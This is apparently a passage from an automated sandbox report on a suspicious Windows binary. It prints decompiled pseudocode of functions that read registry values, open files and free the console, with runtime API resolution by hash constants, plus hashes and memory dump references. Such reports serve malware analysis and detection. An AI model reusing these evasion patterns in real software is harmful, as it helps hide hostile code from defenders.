GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6EF5117B

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
Instruction ID: 2e1b4a4215ac2b9648f87463cf7aa242d55ab77a9c1b390283c0994346015d6e
Opcode Fuzzy Hash: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
Instruction Fuzzy Hash: 75411671244B42ABF751DDEDDC30BAF76DC9BB1304F108C29A560CA294DB60E869C751

Uniqueness

Uniqueness Score: -1.00%

Function 6EF557B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6EF557B4(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6EF53064(0x150c05fc, 0x545b7fe2) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6EF4F828(_a8, _t15);
							if(E6EF53064(0x150c05fc, 0x545b7fe2) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6EF4F4BC(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6ef557b8
0x6ef557b9
0x6ef557bb
0x6ef557c0
0x6ef557c7
0x6ef557cb
0x6ef557cb
0x6ef557cb
0x6ef557cf
0x6ef55815
0x6ef55815
0x6ef557d1
0x6ef557d1
0x6ef557d7
0x6ef557e0
0x6ef557e3
0x6ef557fa
0x6ef5580b
0x6ef5580b
0x6ef5580d
0x6ef55813
0x6ef5581e
0x6ef55836
0x6ef55856
0x6ef55856
0x6ef55858
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ef557d7
0x6ef55860

APIs

RegQueryValueExA.KERNELBASE(?,6EF5D1F8,00000000,?,00000000,00000000,?,?,?,6EF5D1F8,?,6EF55887,?,00000000,00000000), ref: 6EF5580B
RegQueryValueExA.KERNELBASE(?,6EF5D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6EF5D1F8,?,6EF55887,?,00000000), ref: 6EF55856

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction ID: f905ef735ae4defb9d63ee18a10fad99bf2de7b686575bee82ea74f11713cd78
Opcode Fuzzy Hash: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction Fuzzy Hash: 0A11B77120D309EBD750DAA5ECA0E9B7BDCEF75754F00891DB49487241EB21D910CB71

Uniqueness

Uniqueness Score: -1.00%

Function 6EF55B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6EF55B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6EF4D1CC(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6EF4D6D0(__ecx, _t60);
					E6EF4CFF8(_t56,  *_t60);
					E6EF4CFDC(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6EF562B0(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6EF53064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6EF4C26C(_t40);
					if(E6EF4C280(_t40) != 0) {
						_t56[2] = E6EF535F0(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6EF53064(0x8e844d1e, 0xba53868);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6EF53698(_t59, 0xff, 8);
						if(E6EF53064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6ef55b43
0x6ef55b45
0x6ef55b52
0x6ef55b56
0x6ef55b5a
0x6ef55b64
0x6ef55b6b
0x6ef55b6b
0x6ef55b72
0x6ef55b74
0x6ef55b79
0x6ef55b82
0x6ef55b8a
0x6ef55b8a
0x6ef55b7b
0x6ef55b7d
0x6ef55b7d
0x6ef55b79
0x6ef55b8f
0x6ef55b9b
0x6ef55ccc
0x6ef55c09
0x6ef55c12
0x6ef55c13
0x6ef55c18
0x6ef55c19
0x6ef55c0b
0x6ef55c0d
0x6ef55c0d
0x6ef55c2f
0x6ef55c43
0x6ef55c31
0x6ef55c3e
0x6ef55c40
0x6ef55c40
0x6ef55c45
0x6ef55c4a
0x6ef55c58
0x6ef55cc3
0x00000000
0x6ef55c5a
0x6ef55c5f
0x6ef55cac
0x6ef55cae
0x6ef55cb0
0x6ef55cba
0x6ef55cba
0x6ef55cb0
0x6ef55c61
0x6ef55c6d
0x6ef55c86
0x6ef55c88
0x6ef55c89
0x6ef55c8a
0x6ef55c8c
0x6ef55c8e
0x6ef55c8f
0x6ef55c8f
0x00000000
0x6ef55c92
0x6ef55ba1
0x6ef55bb1
0x6ef55bb1

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d84db5d2cb5732dad9de7f12fcf64fd600aa96b2b85b887c1ace4bbf3917db14
Instruction ID: ad7e587a3b2d7100b660ba21b6e0031f61f32a552e9bf60187a821340dad0e28
Opcode Fuzzy Hash: d84db5d2cb5732dad9de7f12fcf64fd600aa96b2b85b887c1ace4bbf3917db14
Instruction Fuzzy Hash: 8D310831344309BFEB502AF94DBCF6B769DDBB1748F00483AF94199386DE519934C661

Uniqueness

Uniqueness Score: -1.00%

Function 01071CE0, Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 30%

			_entry_(void* __eflags, intOrPtr _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				long _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				long _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr _t32;
				int _t40;
				intOrPtr _t46;
				long _t53;
				long _t55;
				intOrPtr* _t56;

				_t27 = _a4;
				 *_t56 = _t27;
				_v20 = _t27;
				_v24 = L01071311(__eflags);
				_t29 = E01071F0B();
				_v28 = _t29;
				if(_t29 != 0) {
					 *_t56 = _v28;
					_t46 =  *((intOrPtr*)(_v20 + 0x20))();
					_t56 = _t56 - 4;
					_v40 = _t46;
				}
				 *_t56 = _v20;
				_t31 = E010724A0();
				 *_t56 = _v20;
				_v44 = _t31;
				_t32 = E01071DA4(); // executed
				_t53 =  *((intOrPtr*)(_v20 + 0x3c));
				_t55 =  *((intOrPtr*)(_t53 + 0x3c));
				_t54 = _t55;
				_t47 = _t53;
				_v48 = _t32;
				_v52 = _t53;
				_v56 = _t55;
				_v36 = _t53;
				if(_t55 != 0) {
					_v36 = _v52 + (_v56 + 0x0000ffff & 0x0000ffff) + 1;
				}
				if( *((short*)(_v36 + 0x5c)) != 3) {
					_t40 = FreeConsole(); // executed
					_v32 = _t40;
				}
				 *_t56 = _v20;
				E01071641();
				 *_t56 = _v20; // executed
				E0107212D(_t47, _t54, _t55); // executed
				return 0;
			}

0x01071ce9
0x01071cec
0x01071cef
0x01071cf7
0x01071cfa
0x01071d02
0x01071d05
0x01071d42
0x01071d48
0x01071d4b
0x01071d4e
0x01071d4e
0x01071d54
0x01071d57
0x01071d5f
0x01071d62
0x01071d65
0x01071d6d
0x01071d70
0x01071d73
0x01071d7a
0x01071d7c
0x01071d7f
0x01071d82
0x01071d85
0x01071d88
0x01071d9f
0x01071d9f
0x01071d3b
0x01071d0e
0x01071d10
0x01071d10
0x01071d16
0x01071d19
0x01071d21
0x01071d24
0x01071d32

APIs

FreeConsole.KERNELBASE ref: 01071D0E

Memory Dump Source

Source File: 00000000.00000002.773825191.0000000001070000.00000040.00000001.sdmp, Offset: 01070000, based on PE: true

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: 721f2712376bc74c1b8219108c061e14804c43831e8523f2793fb1a3d94e463b
Instruction ID: f3ff46e95ae00f1cd2629856f05f5282b78ab3dafe53e96e8b70996711a22ab1
Opcode Fuzzy Hash: 721f2712376bc74c1b8219108c061e14804c43831e8523f2793fb1a3d94e463b
Instruction Fuzzy Hash: C221E3B5E0421A9FCB44EFA9D8845EEBBF1FF48310F144829E994A7380E7759940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 6EF55BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6EF55BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6EF53064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6EF4C26C(_t24);
					if(E6EF4C280(_t24) != 0) {
						_t33[2] = E6EF535F0(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6EF53064(0x8e844d1e, 0xba53868);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6EF53698(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6EF53064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6ef55be5
0x6ef55be7
0x6ef55bfe
0x6ef55c09
0x6ef55c12
0x6ef55c18
0x6ef55c19
0x6ef55c0b
0x6ef55c0d
0x6ef55c0d
0x6ef55c2f
0x6ef55c43
0x6ef55c31
0x6ef55c3e
0x6ef55c40
0x6ef55c40
0x6ef55c45
0x6ef55c4a
0x6ef55c58
0x6ef55cc3
0x6ef55cc6
0x6ef55c5a
0x6ef55c5f
0x6ef55cac
0x6ef55cb0
0x6ef55cba
0x6ef55cba
0x6ef55cb0
0x6ef55c61
0x6ef55c6d
0x6ef55c72
0x6ef55c86
0x6ef55c88
0x6ef55c89
0x6ef55c8a
0x6ef55c8c
0x6ef55c8e
0x6ef55c8f
0x6ef55c8f
0x6ef55c92
0x6ef55c92
0x6ef55be9
0x6ef55be9
0x6ef55bf0
0x6ef55bf0
0x6ef55c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EF55C3E

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction ID: b8373f4ee52db87d0adb2782005a45e60622e635ff8d8c3fa2ffc530147b8747
Opcode Fuzzy Hash: c46e35028ef516b2a6bafbb4d93dcee3a2ebb779e0ca04dcf25d6f0dd780b036
Instruction Fuzzy Hash: F7012631284306BBFA9026F54C6CF7B775CDBB275CF004836B90155389DB22A578C560

Uniqueness

Uniqueness Score: -1.00%

Function 6EF55BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6EF55BBD(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6EF53064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6EF4C26C(_t24);
				if(E6EF4C280(_t24) != 0) {
					_t34[2] = E6EF535F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6EF53064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6EF53698(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6EF53064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6ef55bbd
0x6ef55bc1
0x6ef55bc4
0x6ef55bc7
0x6ef55c09
0x6ef55c12
0x6ef55c18
0x6ef55c19
0x6ef55c0b
0x6ef55c0d
0x6ef55c0d
0x6ef55c2f
0x6ef55c43
0x6ef55c31
0x6ef55c3e
0x6ef55c40
0x6ef55c40
0x6ef55c45
0x6ef55c4a
0x6ef55c58
0x6ef55cc3
0x6ef55cc6
0x6ef55c5a
0x6ef55c5f
0x6ef55cac
0x6ef55cb0
0x6ef55cba
0x6ef55cba
0x6ef55cb0
0x6ef55c61
0x6ef55c6d
0x6ef55c72
0x6ef55c86
0x6ef55c88
0x6ef55c89
0x6ef55c8a
0x6ef55c8c
0x6ef55c8e
0x6ef55c8f
0x6ef55c8f
0x6ef55c92
0x6ef55c92
0x6ef55c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EF55C3E

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction ID: ec72cce791855c573033bb116b2af51a38b92cf67414c2a3094b76a1763cd07b
Opcode Fuzzy Hash: a124f905a7b88adf81c00bd5bc08d6d83bbaf871b5730aa4a2b761ba493ce728
Instruction Fuzzy Hash: 3D01D23238430ABBFA5026F94D69F7B779CDFF275CF008836BA0155389DA5268798521

Uniqueness

Uniqueness Score: -1.00%

Function 6EF55BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E6EF55BD1(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6EF53064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6EF4C26C(_t24);
				if(E6EF4C280(_t24) != 0) {
					_t34[2] = E6EF535F0(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E6EF53064(0x8e844d1e, 0xba53868);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E6EF53698(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					if(E6EF53064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6ef55bd1
0x6ef55bd8
0x6ef55bdb
0x6ef55c09
0x6ef55c12
0x6ef55c18
0x6ef55c19
0x6ef55c0b
0x6ef55c0d
0x6ef55c0d
0x6ef55c2f
0x6ef55c43
0x6ef55c31
0x6ef55c3e
0x6ef55c40
0x6ef55c40
0x6ef55c45
0x6ef55c4a
0x6ef55c58
0x6ef55cc3
0x6ef55cc6
0x6ef55c5a
0x6ef55c5f
0x6ef55cac
0x6ef55cb0
0x6ef55cba
0x6ef55cba
0x6ef55cb0
0x6ef55c61
0x6ef55c6d
0x6ef55c72
0x6ef55c86
0x6ef55c88
0x6ef55c89
0x6ef55c8a
0x6ef55c8c
0x6ef55c8e
0x6ef55c8f
0x6ef55c8f
0x6ef55c92
0x6ef55c92
0x6ef55c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EF55C3E

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction ID: 4128c9b04124627594054a4b8e7a5226fe994d2cc63cd1f60f3350ce2604102a
Opcode Fuzzy Hash: ab2bd4055e11c9f9a2bf07316868f5c1c5b37ceb7e280a100dd82f754eff5fb8
Instruction Fuzzy Hash: E901F53528131ABBFB5026F54D68F7B764DDBF235CF004836BA01953CADE226879C521

Uniqueness

Uniqueness Score: -1.00%

Function 6EF55BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6EF55BB3(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6EF53064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6EF4C26C(_t23);
				if(E6EF4C280(_t23) != 0) {
					_t31[2] = E6EF535F0(0x100);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6EF53064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6EF53698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6EF53064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6ef55bb3
0x6ef55bba
0x6ef55c09
0x6ef55c12
0x6ef55c18
0x6ef55c19
0x6ef55c0b
0x6ef55c0d
0x6ef55c0d
0x6ef55c2f
0x6ef55c43
0x6ef55c31
0x6ef55c3e
0x6ef55c40
0x6ef55c40
0x6ef55c45
0x6ef55c4a
0x6ef55c58
0x6ef55cc3
0x6ef55cc6
0x6ef55c5a
0x6ef55c5f
0x6ef55cac
0x6ef55cb0
0x6ef55cba
0x6ef55cba
0x6ef55cb0
0x6ef55c61
0x6ef55c6d
0x6ef55c72
0x6ef55c86
0x6ef55c88
0x6ef55c89
0x6ef55c8a
0x6ef55c8c
0x6ef55c8e
0x6ef55c8f
0x6ef55c8f
0x6ef55c92
0x6ef55c92
0x6ef55c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EF55C3E

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction ID: 2bc3d17e9e21a4defb7702df7fb757634704e01729594e5af211d6fe1216d12b
Opcode Fuzzy Hash: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction Fuzzy Hash: 1E01243228030ABBFA9126F54C68F7B764CCBB235CF004836BA0165389DE126979C520

Uniqueness

Uniqueness Score: -1.00%

Function 6EF55C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6EF55C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6EF53064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6EF4C26C(_t23);
				if(E6EF4C280(_t23) != 0) {
					_t31[2] = E6EF535F0(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6EF53064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6EF53698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6EF53064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6ef55c01
0x6ef55c05
0x6ef55c09
0x6ef55c12
0x6ef55c18
0x6ef55c19
0x6ef55c0b
0x6ef55c0d
0x6ef55c0d
0x6ef55c2f
0x6ef55c43
0x6ef55c31
0x6ef55c3e
0x6ef55c40
0x6ef55c40
0x6ef55c45
0x6ef55c4a
0x6ef55c58
0x6ef55cc3
0x6ef55cc6
0x6ef55c5a
0x6ef55c5f
0x6ef55cac
0x6ef55cb0
0x6ef55cba
0x6ef55cba
0x6ef55cb0
0x6ef55c61
0x6ef55c6d
0x6ef55c72
0x6ef55c86
0x6ef55c88
0x6ef55c89
0x6ef55c8a
0x6ef55c8c
0x6ef55c8e
0x6ef55c8f
0x6ef55c8f
0x6ef55c92
0x6ef55c92
0x6ef55c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EF55C3E

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction ID: b7f100b3dfdbc2664d0c77210617870526f6f9436b7a15a75675f2dbddafb3b9
Opcode Fuzzy Hash: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction Fuzzy Hash: 8701473128130ABBFA9026F44D68F7B774CCFB275CF004836BA0155389DE126579C520

Uniqueness

Uniqueness Score: -1.00%

Function 6EF55E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6EF55E10(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6EF4C280(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
